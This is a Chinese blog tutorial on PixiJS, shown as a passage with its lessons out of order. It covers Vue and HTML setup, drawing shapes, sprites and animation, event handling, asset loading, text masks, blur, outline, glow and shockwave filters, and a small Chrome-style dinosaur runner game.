    antialias: true, // 设置抗锯齿
    })

    // 将应用画布添加到 DOM 中
    document.body.appendChild(app.view);

    // 创建一个纹理
    const texture = PIXI.Texture.from("./textures/mujian.png");
    // 创建一个精灵
    const sprite = new PIXI.Sprite(texture);
    // 设置精灵的位置
    sprite.x = app.screen.width / 2;
    sprite.y = app.screen.height / 2;

    // 设置精灵的锚点
    sprite.anchor.set(0.5);

    // 将精灵添加到舞台
    app.stage.addChild(sprite);

    //创建轮廓滤镜
    const outlineFilter = new PIXI.filters.OutlineFilter(5, 0xffff00); // 2为轮廓宽度,0x000000为轮廓颜色
    // 创建发光滤镜
    const glowFilter = new PIXI.filters.GlowFilter({
    distance: 50,
    outerStrength: 1,
    innerStrength: 0,
    color: 0xff0000,
    quality: 0.5,
    });
    //将轮廓滤镜添加到精灵上
    sprite.filters = [outlineFilter, glowFilter];

    演示

    09-应用Pixi实现波浪水滴特效主页

    ​ 创建场景:一个背景以及一个带阴影的文字对象。

    // 创建应用
    const app = new PIXI.Application({
    width: window.innerWidth,
    height: window.innerHeight,
    backgroundColor: 0x1099bb,
    resolution: window.devicePixelRatio || 1,
    antialias: true, // 抗锯齿
    });

    // 将应用画布添加到DOM中
    document.body.appendChild(app.view);

    // 创建一个纹理
    const texture = PIXI.Texture.from("./textures/car.jpg");
    // 创建一个精灵
    const sprite = new PIXI.Sprite(texture);
    sprite.width = app.screen.width;
    sprite.height = app.screen.height;

    // 创建容器
    const container = new PIXI.Container();
    // 将精灵添加到容器中
    container.addChild(sprite);
    // 将容器添加到舞台
    app.stage.addChild(container);

    // 添加文字
    const text = new PIXI.Text("Hello PixiJS", {
    fontFamily: "Arial",
    fontSize: 30 + Math.floor(app.screen.width * 0.1),
    fill: 0xffffff,
    align: "center",
    dropShadow: true,
    dropShadowColor: "#000000",
    dropShadowBlur: 4,
    dropShadowAngle: Math.PI / 2,
    dropShadowDistance: 2,
    });
    text.x = app.screen.width / 2;
    text.y = app.screen.height / 2;
    text.anchor.set(0.5);
    container.addChild(text);

    09_1

    ​ 添加置换滤镜:

    // 添加置换滤镜
    const displacementSprite = PIXI.Sprite.from("./textures/displacement.jpg");
    displacementSprite.scale.set(0.5);
    displacementSprite.texture.baseTexture.wrapMode = PIXI.WRAP_MODES.REPEAT;
    const displacementFilter = new PIXI.DisplacementFilter(displacementSprite);
    container.addChild(displacementSprite);

    ​ 一个置换图 displacement.jpg 实现画面涟漪的效果:

    displacement.jpg

    ​ 定义大、中、小三种震波滤镜(需要pixi-filter 支持):

    // 添加震波滤镜
    const shockwaveFilter1 = new PIXI.filters.ShockwaveFilter(
    [Math.random() * app.screen.width, Math.random() * app.screen.height],
    {
    radius: 80, //半径
    waveLength: 40, //波长
    amplitude: 40, //振幅
    speed: 200,
    },
    0
    );

    const shockwaveFilter2 = new PIXI.filters.ShockwaveFilter(
    [Math.random() * app.screen.width, Math.random() * app.screen.height],
    {
    radius: 100, //半径
    waveLength: 45, //波长
    amplitude: 80, //振幅
    speed: 240,
    },
    0
    );

    const shockwaveFilter3 = new PIXI.filters.ShockwaveFilter(
    [Math.random() * app.screen.width, Math.random() * app.screen.height],
    {
    radius: 160, //半径
    waveLength: 65, //波长
    amplitude: 105, //振幅
    speed: 300,
    },
    0
    );

    ​ 应用这些滤镜(app.ticker.add 有点像 Unity 里的 Update()):

    container.filters = [
    displacementFilter,
    shockwaveFilter1,
    shockwaveFilter2,
    shockwaveFilter3,
    ];

    ​ 随机创建震波滤镜:

    app.ticker.add((delta) => {
    displacementSprite.x += 1;
    displacementSprite.y += 1;
    createWave(shockwaveFilter1, 1);
    createWave(shockwaveFilter2, 1.2);
    createWave(shockwaveFilter3, 0.7);
    });

    function createWave(waveFilter, resetTime) {
    waveFilter.time += 0.01;
    if (waveFilter.time > resetTime) {
    waveFilter.time = 0;
    waveFilter.center = [
    Math.random() * app.screen.width,
    Math.random() * app.screen.height,
    ];
    }
    }

    ​ 设置点击创建震波滤镜的效果:

    // 监听点击事件,根据位置创建震波滤镜
    app.view.addEventListener("click", (e) => {
    console.log(e.clientX, e.clientY);
    shockwaveFilter3.center = [e.clientX, e.clientY];
    shockwaveFilter3.time = 0;
    });

    演示

    10-pixijs开发谷歌恐龙跑酷小游戏

    ​ 我在原教程的基础上魔改了一些内容。

    ​ 创建应用,导入 baseTexture(是一个雪碧图):

    雪碧图

    // 创建应用
    const app = new PIXI.Application({
    width: window.innerWidth,
    height: window.innerHeight,
    backgroundColor: 0xffffff,
    resolution: window.devicePixelRatio || 1,
    antialias: true, // 抗锯齿
    });

    // 将应用画布添加到DOM中
    document.body.appendChild(app.view);

    // 创建容器
    const container = new PIXI.Container();

    // 将容器添加到舞台
    app.stage.addChild(container);

    // 添加恐龙小游戏的精灵纹理
    const baseTexture = PIXI.BaseTexture.from("./textures/game.png");

    ​ 设置恐龙的宽高:

    const frameWidth = 88;
    const frameHeight = 100;

    ​ 创建各种资源:

    // 创建恐龙纹理
    const dinoTexture = new PIXI.Texture(
    baseTexture,
    new PIXI.Rectangle(75, 0, frameWidth, frameHeight)
    );
    // 创建恐龙精灵
    const dino = new PIXI.Sprite(dinoTexture);
    dino.visible = false;
    container.addChild(dino);
    // 恐龙跑步动画;
    const runTexture = new PIXI.Texture(
    baseTexture,
    new PIXI.Rectangle(1675, 0, frameWidth, frameHeight)
    );
    const runSprite = new PIXI.Sprite(runTexture);
    runSprite.visible = false;
    container.addChild(runSprite);

    let runTextures = [];
    for (let i = 0; i < 2; i++) {
    runTextures.push(
    new PIXI.Texture(
    baseTexture,
    new PIXI.Rectangle(1680 + (2 + i) * frameWidth, 0, 82, frameHeight)
    )
    );
    }
    const runAnimation = new PIXI.AnimatedSprite(runTextures);
    runAnimation.animationSpeed = 0.1;
    runAnimation.play();
    runAnimation.visible = false;
    container.addChild(runAnimation);
    // 恐龙死亡动画;
    let deadTextures = [];
    for (let i = 0; i < 2; i++) {
    deadTextures.push(
    new PIXI.Texture(
    baseTexture,
    new PIXI.Rectangle(1680 + (0 + i) * frameWidth, 0, 82, frameHeight)
    )
    );
    }
    const deadAnimation = new PIXI.AnimatedSprite(deadTextures);
    deadAnimation.animationSpeed = 0.1;
    deadAnimation.play();
    deadAnimation.visible = false;
    container.addChild(deadAnimation);
    // 恐龙跳跃精灵
    const jumpTexture = new PIXI.Texture(
    baseTexture,
    new PIXI.Rectangle(1680, 0, 82, frameHeight)
    );
    const jumpSprite = new PIXI.Sprite(jumpTexture);
    jumpSprite.visible = false;
    container.addChild(jumpSprite);
    // 地面精灵
    const groundTexture = new PIXI.Texture(
    baseTexture,
    new PIXI.Rectangle(50, 100, 2300, 30)
    );
    // 设置纹理水平镜像重复
    groundTexture.baseTexture.wrapMode = PIXI.WRAP_MODES.REPEAT;

    const groundSprite = new PIXI.TilingSprite(groundTexture);
    groundSprite.width = window.innerWidth;
    groundSprite.height = 30;
    // 设置地面精灵的位置
    groundSprite.position.set(0, window.innerHeight - 50);

    container.addChild(groundSprite);
    // 仙人掌精灵
    const cactusTexture = new PIXI.Texture(
    baseTexture,
    new PIXI.Rectangle(515, 0, 30, 60)
    );
    const cactusSprite = new PIXI.Sprite(cactusTexture);
    cactusSprite.x = getRandomInt(window.innerWidth, window.innerWidth * 1.5);
    cactusSprite.y = window.innerHeight - 50 - 50;
    container.addChild(cactusSprite);

    ​ 创建提示文字,点击 开始游戏 时,开始游戏:

    // 创建文字
    let hintsText = new PIXI.Text("开始游戏", {
    fontSize: 30,
    fill: 0x333333,
    align: "center",
    });
    hintsText.x = app.screen.width / 2;
    hintsText.y = app.screen.height / 2;
    hintsText.anchor.set(0.5);
    container.addChild(hintsText);
    hintsText.interactive = true;
    hintsText.on("click", () => {
    playGame();
    });
    hintsText.addEventListener('touchstart', function (event) {
    playGame();
    });

    ​ 开始游戏的逻辑:

    let isGameing = false;
    let score = 0;
    let jumpVelocity = 1200; // 跳跃初速度,单位:像素/秒
    let gravity = 5000; // 重力加速度,单位:像素/秒^2

    // 开始游戏
    function playGame(e) {
    hintsText.text = "得分:" + score;
    // 恐龙跑步动画;
    runAnimation.x = 60;
    runAnimation.y = window.innerHeight - 50 - frameHeight;
    runAnimation.visible = true;
    // 恐龙死亡动画;
    deadAnimation.x = 60;
    deadAnimation.y = window.innerHeight - 50 - frameHeight;
    deadAnimation.visible = false;
    // 恐龙跳跃精灵
    jumpSprite.x = 60;
    jumpSprite.y = window.innerHeight - 50 - frameHeight;
    jumpSprite.visible = false;

    // 移除开始游戏的点击和触摸事件监听器
    hintsText.interactive = false;
    hintsText.off("click");
    hintsText.removeEventListener('touchstart', playGame);

    // 可以考虑在这里添加一个小延迟再添加跳跃的事件监听器,以避免立即触发跳跃
    setTimeout(() => {
    window.addEventListener("keydown", (e) => {
    if (e.code === "Space") {
    jump();
    }
    });
    app.view.addEventListener('click', jump);
    app.view.addEventListener('touchstart', jump);
    }, 100); // 延迟 100 毫秒添加跳跃事件监听器

    isGameing = true;
    }

    ​ 跳跃逻辑:

    function jump() {
    if (isGameing && !jumpSprite.visible) {
    runAnimation.visible = false;
    jumpSprite.visible = true;
    jumpVelocity = 1200; // 确保每次跳跃前都重置了跳跃速度
    }
    }

    ​ 实时控制游戏逻辑:

    app.ticker.add((delta) => {
    if (isGameing) {
    hintsText.text = "得分:" + score;
    // 获取自上一帧以来的秒数
    let deltaTime = app.ticker.deltaMS / 1000;
    // 计算基于时间的移动距离
    const groundSpeed = 1000 * deltaTime * Math.log10(10 + score);
    const cactusSpeed = groundSpeed;
    // 地面精灵
    groundSprite.tilePosition.x -= groundSpeed;
    // 仙人掌精灵
    cactusSprite.x -= cactusSpeed;

    if (cactusSprite.x <= -30) {
    cactusSprite.x = getRandomInt(window.innerWidth, window.innerWidth * 2);
    score++;
    }

    if (jumpSprite.visible) {
    // 根据deltaTime调整跳跃速度和重力
    jumpVelocity -= gravity * deltaTime; // 跳跃速度随时间减小
    jumpSprite.y -= jumpVelocity * deltaTime; // 根据跳跃速度更新位置

    // 检查是否落地
    if (jumpSprite.y >= window.innerHeight - 50 - frameHeight) {
    console.log("跳跃结束");
    jumpSprite.y = window.innerHeight - 50 - frameHeight; // 确保不会穿过地面
    runAnimation.visible = true;
    jumpSprite.visible = false;
    }
    }

    // 判断跳跃精灵与仙人掌精灵是否碰撞
    if (
    jumpSprite.y > cactusSprite.y - 60 &&
    jumpSprite.x + 60 > cactusSprite.x &&
    jumpSprite.x - 60 < cactusSprite.x
    ) {
    // 游戏结束
    gameOver();
    }
    } else {
    return;
    }
    });

    ​ 游戏结束逻辑:

    function gameOver() {
    console.log("游戏结束");
    // 游戏结束
    isGameing = false;
    deadAnimation.visible = true;
    runAnimation.visible = false;
    jumpSprite.visible = false;
    hintsText.text = "游戏结束,最后得分:" + score;
    hintsText.interactive = true;
    hintsText.on("click", () => {
    location.reload();
    });
    hintsText.addEventListener('touchstart', function (event) {
    location.reload();
    });
    }

    演示(emmm 手机上玩起来适配还不是很好……)

    ]]>
    + 资源

    课程

    01-Pixi 初识和搭建 Pixi 应用

    1
    npm install -g @vue/cli
    • 全局安装 yarn
    1
    npm install --g yarn
    • 项目文件下命令行创建 Vue 项目(好家伙这就 100 来 MB……):
    1
    vue create 01-pixiapp

    创建 Vue

    • 转到这个项目:
    1
    cd 01-pixiapp
    • 安装 pixi.js
    1
    yarn add pixi.js
    • 启动项目:
    1
    yarn serve

    启动服务器


    • 编辑 01-pixiapp/App.vue
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    <template>
    <div></div>
    </template>

    <script setup>
    // 导入 pixi.js
    import * as PIXI from 'pixi.js';

    // 创建应用
    const app = new PIXI.Application({
    width: window.innerWidth,
    height: window.innerHeight,
    backgroundColor: 0x1099bb,
    resolution: window.devicePixelRatio || 1,
    })

    // 将应用画布添加到 DOM 中
    document.body.appendChild(app.view);

    // 创建一个矩形
    const rectangle = new PIXI.Graphics();
    rectangle.beginFill(0x66ccff); // 填充颜色
    rectangle.drawRect(200, 200, 164, 64); // 绘制矩形
    rectangle.endFill(); // 结束填充

    // 将矩形添加至舞台
    app.stage.addChild(rectangle);

    </script>

    <style>
    * {
    margin: 0;
    padding: 0;
    box-sizing: border-box;
    }
    canvas {
    width: 100vw;
    height: 100vh;
    position: fixed;
    left: 0;
    }
    </style>

    ​ HTML 下使用 <script src="https://pixijs.download/release/pixi.js"></script> 直接导入 pixi.js

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    <!DOCTYPE html>
    <html lang="en">
    <head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
    <style>
    * {
    margin: 0;
    padding: 0;
    box-sizing: border-box;
    }
    canvas {
    width: 100vw;
    height: 100vh;
    position: fixed;
    left: 0;
    }
    </style>
    </head>
    <body>
    </body>
    <script src="https://pixijs.download/release/pixi.js"></script>
    <script>
    // 创建应用
    const app = new PIXI.Application({
    width: window.innerWidth,
    height: window.innerHeight,
    backgroundColor: 0x1099bb,
    resolution: window.devicePixelRatio || 1,
    })

    // 将应用画布添加到 DOM 中
    document.body.appendChild(app.view);

    // 创建一个矩形
    const rectangle = new PIXI.Graphics();
    rectangle.beginFill(0x66ccff); // 填充颜色
    rectangle.drawRect(200, 200, 164, 64); // 绘制矩形
    rectangle.endFill(); // 结束填充

    // 将矩形添加至舞台
    app.stage.addChild(rectangle);
    </script>
    </html>

    ​ Vue 代码解释:

    ​ 这部分定义了组件的 HTML 结构。在这个例子中,模板仅包含一个空的 <div> 元素。实际上,这个 <div> 在此示例中未直接使用,因为 PixiJS 的画布 (canvas) 是通过脚本直接添加到 document.body 中的,而不是被插入到这个 <div> 内。

    1
    2
    3
    <template>
    <div></div>
    </template>

    ​ 这部分是组件的 JavaScript 逻辑,主要做了以下几件事情:

    1. 导入 PixiJS:使用 import 语句导入 PixiJS 库。
    2. 创建 PixiJS 应用:实例化一个新的 PixiJS Application 对象,并设置其大小和背景颜色等属性。这个应用对象会自动生成一个 <canvas> 元素。
    3. <canvas> 元素添加到 DOM:通过 document.body.appendChild(app.view); 将 PixiJS 创建的 <canvas> 元素添加到 HTML 文档的 <body> 中。
    4. 绘制图形:使用 PixiJS 的 Graphics 类创建一个矩形,并设置其填充颜色和位置,最后将这个矩形添加到 PixiJS 应用的舞台(stage)上,以便显示。
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    <script setup>
    // 导入 pixi.js
    import * as PIXI from 'pixi.js';

    // 创建应用
    const app = new PIXI.Application({
    width: window.innerWidth, // 宽度设置为窗口宽度
    height: window.innerHeight, // 高度设置为窗口高度
    backgroundColor: 0x1099bb, // 背景颜色设置为浅蓝色
    resolution: window.devicePixelRatio || 1, // 分辨率设置为设备的像素比或默认值 1
    })

    // 将应用画布添加到 DOM 中
    document.body.appendChild(app.view);

    // 创建一个矩形
    const rectangle = new PIXI.Graphics();
    rectangle.beginFill(0x66ccff); // 开始填充颜色为浅蓝色
    rectangle.drawRect(200, 200, 164, 64); // 在坐标 (200, 200) 处绘制一个 164 x 64 大小的矩形
    rectangle.endFill(); // 结束填充

    // 将矩形添加至舞台
    app.stage.addChild(rectangle);
    </script>

    ​ 这部分定义了页面的 CSS 样式:

    • 重置所有元素的 marginpadding,并设置 box-sizingborder-box,以确保布局的一致性。
    • 设置 <canvas> 元素的样式,使其宽度和高度分别占满视口的宽度和高度,并通过 position: fixed 确保 <canvas> 始终覆盖整个视口。
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    <style>
    * {
    margin: 0;
    padding: 0;
    box-sizing: border-box;
    }
    canvas {
    width: 100vw;
    height: 100vh;
    position: fixed;
    left: 0;
    }
    </style>

    ​ 打开 http://localhost:8080/

    渲染效果

    02-Pixi图形Graphics具体应用

    ​ 使用 Pixi 创建其它图形,设置:

    • 缩放:scale.set()
    • 位移:position.set()
    • 旋转:rotation
    • 锚点:pivot.set()
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    // 创建应用
    const app = new PIXI.Application({
    width: window.innerWidth,
    height: window.innerHeight,
    backgroundColor: 0x1099bb,
    resolution: window.devicePixelRatio || 1,
    antialias: true, // 设置抗锯齿
    })

    // 将应用画布添加到 DOM 中
    document.body.appendChild(app.view);

    // 创建一个矩形
    const rectangle = new PIXI.Graphics();
    rectangle.lineStyle(4, 0xff0000, 1); // 设置边框样式:线宽,线颜色,透明度
    rectangle.beginFill(0x66ccff, 0.9); // 填充颜色
    rectangle.drawRect(0, 0, 164, 64); // 绘制矩形
    rectangle.endFill(); // 结束填充

    // 图形的缩放
    rectangle.scale.set(2, 2);
    // 图形的位移
    rectangle.position.set(100, 100);
    // 图形的旋转
    rectangle.rotation = 0.5;
    // 图形的锚点
    rectangle.pivot.set(82, 32);

    // 将矩形添加至舞台
    app.stage.addChild(rectangle);

    // 创建一个圆形
    const circle = new PIXI.Graphics();
    circle.beginFill(0x66ccff, 0.9);
    circle.drawCircle(0, 0, 32);
    circle.endFill();
    circle.position.set(300, 300);
    app.stage.addChild(circle);

    03-Pixi绘制各种常见图形

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    // 创建一个矩形
    const rectangle = new PIXI.Graphics();
    rectangle.lineStyle(4, 0xff0000, 1); // 设置边框样式:线宽,线颜色,透明度
    rectangle.beginFill(0x66ccff, 0.9); // 填充颜色
    rectangle.drawRect(0, 0, 164, 64); // 绘制矩形
    rectangle.endFill(); // 结束填充
    // 图形的缩放
    rectangle.scale.set(2, 2);
    // 图形的位移
    rectangle.position.set(100, 100);
    // 图形的旋转
    rectangle.rotation = 0.5;
    // 图形的锚点
    rectangle.pivot.set(82, 32);
    // 将矩形添加至舞台
    app.stage.addChild(rectangle);
    1
    2
    3
    4
    5
    6
    7
    // 创建一个圆形
    const circle = new PIXI.Graphics();
    circle.beginFill(0x66ccff, 0.9);
    circle.drawCircle(0, 0, 32);
    circle.endFill();
    circle.position.set(300, 300);
    app.stage.addChild(circle);
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    // 创建圆角矩形
    const roundedRectangle = new PIXI.Graphics();
    roundedRectangle.beginFill(0x66ccff, 0.9);
    /* 绘制圆角矩形,
    第一个参数是 x 坐标,
    第二个参数是 y 坐标,
    第三个参数是宽度,
    第四个参数是高度,
    第五个参数是圆角半径
    */
    roundedRectangle.drawRoundedRect(0, 0, 164, 64, 10);
    roundedRectangle.endFill();
    roundedRectangle.position.set(500, 500);
    app.stage.addChild(roundedRectangle);
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    // 绘制椭圆
    const ellipse = new PIXI.Graphics();
    ellipse.beginFill(0x66ccff, 0.9);
    /* 绘制椭圆,
    第一个参数是 x 坐标,
    第二个参数是 y 坐标,
    第三个参数是宽度,
    第四个参数是高度
    */
    ellipse.drawEllipse(0, 0, 164, 164);
    ellipse.endFill();
    ellipse.position.set(700, 700);
    app.stage.addChild(ellipse);
    1
    2
    3
    4
    5
    6
    7
    8
    // 绘制多边形
    const polygon = new PIXI.Graphics();
    polygon.beginFill(0x66ccff, 0.9);
    // 绘制多边形,参数是一个数组,数组中的每个元素是一个点的坐标,每两个元素是一个点的 x 坐标和 y 坐标。
    polygon.drawPolygon([0, 0, 100, 0, 100, 100, 0, 100]);
    polygon.endFill();
    polygon.position.set(50, 300);
    app.stage.addChild(polygon);
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    // 绘制圆弧(扇形)
    const arc = new PIXI.Graphics();
    arc.beginFill(0x660000, 0.9);
    /* 绘制圆弧,
    第一个参数是 x 坐标,
    第二个参数是 y 坐标,
    第三个参数是半径,
    第四个参数是起始角度,
    第五个参数是结束角度。
    第六个参数是是否逆时针
    */
    arc.arc(0, 0, 32, 0, Math.PI, false);
    arc.endFill();
    arc.position.set(300, 50);
    app.stage.addChild(arc);
    1
    2
    3
    4
    5
    6
    7
    8
    // 绘制线段
    const line = new PIXI.Graphics();
    line.lineStyle(4, 0xff0000, 1);
    line.moveTo(0, 0); // 设置线段的起始点
    line.lineTo(100, 100); // 设置线段的结束点
    line.lineTo(200, 0);
    line.position.set(500, 50);
    app.stage.addChild(line);

    渲染效果

    04-Pixi纹理与动画实现

    ​ 使用代码创建一个木剑的旋转动画:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    // 创建应用
    const app = new PIXI.Application({
    width: window.innerWidth,
    height: window.innerHeight,
    backgroundColor: 0x1099bb,
    resolution: window.devicePixelRatio || 1,
    antialias: true, // 设置抗锯齿
    })

    // 将应用画布添加到 DOM 中
    document.body.appendChild(app.view);

    // 创建一个纹理
    const texture = PIXI.Texture.from("./textures/mujian.png");

    // 创建一个精灵
    const sprite = new PIXI.Sprite(texture);

    // 设置精灵的锚点
    sprite.anchor.set(0.5, 0.5);

    // 设置精灵的位置
    sprite.x = app.screen.width / 2;
    sprite.y = app.screen.height / 2;

    // 设置精灵旋转 45 度
    sprite.rotation = Math.PI / 4;

    // 设置精灵的缩放
    sprite.scale.set(2, 2);

    // 设置精灵的透明度
    sprite.alpha = 0.5;

    app.stage.addChild(sprite);

    // ticker 实现动画
    app.ticker.add((delta) => {
    console.log(delta);
    sprite.rotation += 0.01 * delta;
    })

    演示

    05-Pixi事件交互

    ​ 在上一节的代码上,继续追加交互的代码:

    1
    2
    3
    4
    sprite.interactive = true;
    sprite.on("click", () => {
    sprite.alpha = 1;
    });
    1
    2
    3
    sprite.on("pointerenter", () => {
    sprite.alpha = 0.75;
    });
    1
    2
    3
    sprite.on("pointerout", () => {
    sprite.alpha = 0.5;
    });

    ​ 如下所示,当鼠标点击 / 移入 / 移出 木剑时,将产生一定的交互效果。

    演示

    06-Pixi资源管理

    ​ 两种不同的资源加载方式:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    // 添加资源
    PIXI.Assets.add("sword", "./textures/jian.png");
    PIXI.Assets.add("man", "./textures/man.png");
    PIXI.Assets.add("woodenSword", "./textures/mujian.png");

    // 异步加载资源
    const texturesPromise = PIXI.Assets.load(["sword", "man", "woodenSword"], (progress) => {
    console.log("加载完成:", progress);
    });
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    // 添加场景一资源
    PIXI.Assets.addBundle("scene1", {
    sword: "./textures/jian.png",
    man: "./textures/man.png",
    woodenSword: "./textures/mujian.png",
    });

    const texturesPromise = PIXI.Assets.loadBundle("scene1", (progress) => {
    console.log("加载完成:", progress);
    });

    ​ 操作一下所创建的资源对象 texturesPromise

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    // 加载完成后创建精灵
    texturesPromise.then((textures) => {
    // 创建容器
    const container = new PIXI.Container();
    // 创建精灵
    const sprite = new PIXI.Sprite(textures.sword);
    // 设置精灵位置
    sprite.x = app.screen.width / 2;
    sprite.y = app.screen.height / 2;
    // 设置精灵锚点
    sprite.anchor.set(0.5);
    // 设置精灵缩放
    sprite.scale.set(0.5);
    // 设置精灵透明度
    sprite.alpha = 0.5;
    // 设置精灵旋转
    sprite.rotation = 0.5;
    // 设置精灵混合模式
    sprite.blendMode = PIXI.BLEND_MODES.ADD;
    // 设置精灵交互
    sprite.interactive = true;
    // 设置精灵鼠标样式
    sprite.buttonMode = true;
    // 设置精灵鼠标事件
    sprite.on("pointerdown", () => {
    console.log("pointerdown");
    });
    container.addChild(sprite);

    // 创建精灵
    const sprite2 = new PIXI.Sprite(textures.man);
    sprite2.scale.set(0.1);
    container.addChild(sprite2);
    app.stage.addChild(container);
    });

    演示

    07-Pixi文字与遮罩

    new PIXI.Text() 创建文字对象:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    // 显示 hello world 文字
    const text = new PIXI.Text("Hello World", {
    fontFamily: "Arial",
    fontSize: 120,
    fill: 0xff0000,
    align: "center",
    });

    // 设置文字位置
    text.x = app.screen.width / 2;
    text.y = app.screen.height / 2;

    // 设置文字锚点
    text.anchor.set(0.5);
    app.stage.addChild(text);

    演示

    mask 给精灵设置另一个精灵做遮罩:

    1
    2
    3
    4
    5
    6
    7
    8
    // 创建一个精灵
    const bg = PIXI.Sprite.from("./textures/bg.png");
    bg.width = app.screen.width;
    bg.height = app.screen.height;
    // 使用文字作为精灵的遮罩
    bg.mask = woodenSword;
    app.stage.addChild(bg);
    app.stage.addChild(woodenSword);

    演示

    ​ 使用文字作为遮罩:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    // 显示 hello world 文字
    const text = new PIXI.Text("Hello World", {
    fontFamily: "Arial",
    fontSize: 120,
    fill: 0xff0000,
    align: "center",
    });

    // 设置文字位置
    text.x = app.screen.width / 2;
    text.y = app.screen.height / 2;

    // 设置文字锚点
    text.anchor.set(0.5);

    // 创建一个精灵
    const bg = PIXI.Sprite.from("./textures/bg.png");
    bg.width = app.screen.width;
    bg.height = app.screen.height;
    // 使用文字作为精灵的遮罩
    bg.mask = text;
    app.stage.addChild(bg);

    演示

    08-Pixi滤镜特效

    ​ 先创建一个精灵用于操作:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    // 创建一个纹理
    const texture = PIXI.Texture.from("./textures/mujian.png");
    // 创建一个精灵
    const sprite = new PIXI.Sprite(texture);
    // 设置精灵的位置
    sprite.x = app.screen.width / 2;
    sprite.y = app.screen.height / 2;

    // 设置精灵的锚点
    sprite.anchor.set(0.5);

    // 将精灵添加至舞台
    app.stage.addChild(sprite);

    自带滤镜:模糊

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    // 创建模糊滤镜
    const blurFilter = new PIXI.BlurFilter();
    // 设置模糊滤镜的模糊程度
    blurFilter.blur = 20;
    // 将模糊滤镜添加到精灵上
    sprite.filters = [blurFilter];

    // 监听鼠标是否进入精灵
    sprite.interactive = true;
    sprite.on("pointerover", () =>{
    // 设置模糊滤镜的模糊程度
    blurFilter.blur = 0;
    });
    sprite.on("pointerout", () =>{
    // 设置模糊滤镜的模糊程度
    blurFilter.blur = 20;
    });

    演示

    pixi-filters:扩展滤镜:轮廓与辉光

    ​ 使用:

    1
    yarn add pixi-filters

    安装,然后使用

    1
    import {XXXFilter} from "pixi-filters";

    来导入。

    Vue 下输入代码:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    <template>
    <div></div>
    </template>

    <script setup>
    // 导入 pixi.js
    import * as PIXI from 'pixi.js';
    import {OutlineFilter} from 'pixi-filters';
    import {GlowFilter} from 'pixi-filters';

    // 创建应用
    const app = new PIXI.Application({
    width: window.innerWidth,
    height: window.innerHeight,
    backgroundColor: 0x1099bb,
    resolution: window.devicePixelRatio || 1,
    antialias: true, // 设置抗锯齿
    })

    // 将应用画布添加到 DOM 中
    document.body.appendChild(app.view);

    // 创建一个纹理
    const texture = PIXI.Texture.from("./textures/mujian.png");
    // 创建一个精灵
    const sprite = new PIXI.Sprite(texture);
    // 设置精灵的位置
    sprite.x = app.screen.width / 2;
    sprite.y = app.screen.height / 2;

    // 设置精灵的锚点
    sprite.anchor.set(0.5);

    // 将精灵添加到舞台
    app.stage.addChild(sprite);

    //创建轮廓滤镜
    const outlineFilter = new OutlineFilter(5, 0xffff00); // 2 为轮廓宽度,0x000000 为轮廓颜色
    // 创建发光滤镜
    const glowFilter = new GlowFilter({
    distance: 50,
    outerStrength: 1,
    innerStrength: 0,
    color: 0xff0000,
    quality: 0.5,
    });
    // 将轮廓滤镜添加到精灵上
    sprite.filters = [outlineFilter, glowFilter];

    </script>

    <style>
    * {
    margin: 0;
    padding: 0;
    box-sizing: border-box;
    }
    canvas {
    width: 100vw;
    height: 100vh;
    position: fixed;
    left: 0;
    }
    </style>
    1
    <script src="https://cdn.jsdelivr.net/npm/pixi-filters@latest/dist/browser/pixi-filters.min.js"></script>

    ​ HTML 下使用代码(将 OutlineFilterGlowFilter 分别改为 new PIXI.filters.OutlineFilterPIXI.filters.GlowFilter):

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    // 创建应用
    const app = new PIXI.Application({
    width: window.innerWidth,
    height: window.innerHeight,
    backgroundColor: 0x1099bb,
    resolution: window.devicePixelRatio || 1,
